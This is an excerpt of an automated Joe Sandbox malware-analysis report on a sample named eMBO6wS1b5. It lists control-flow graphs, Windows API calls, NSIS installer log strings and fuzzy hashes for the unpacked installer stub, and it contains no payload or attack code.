                                                                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID: jF
                                                                                          • API String ID: 2295610775-3349280890
                                                                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                          • String ID:
                                                                                          • API String ID: 310444273-0
                                                                                          • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                          • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                          • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                          • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                          APIs
                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                          Strings
                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                          • Call: %d, xrefs: 0040165A
                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                          • BringToFront, xrefs: 004016BD
                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                          • Jump: %d, xrefs: 00401602
                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                          • API String ID: 2872004960-3619442763
                                                                                          • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                          • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                          • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                          • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                          • ShowWindow.USER32(?), ref: 004054FE
                                                                                          • DestroyWindow.USER32 ref: 00405512
                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                          • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                          • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                          • EnableWindow.USER32(?,?), ref: 00405783
                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                          • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                          • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                          • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 3282139019-0
                                                                                          • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                          • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                          • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                          • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                          APIs
                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                          • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                          • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                          • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                          • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                            • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                          • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                          • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                          • API String ID: 608394941-2746725676
                                                                                          • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                          • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                          • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                          • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          • lstrcatW.KERNEL32(00000000,00000000,153,004D70B0,00000000,00000000), ref: 00401A76
                                                                                          • CompareFileTime.KERNEL32(-00000014,?,153,153,00000000,00000000,153,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426579,762323A0,00000000), ref: 00404FD6
                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FE6
                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FF9
                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                          • String ID: 153$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                          • API String ID: 4286501637-2853168234
                                                                                          • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                          • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                          • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                          • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
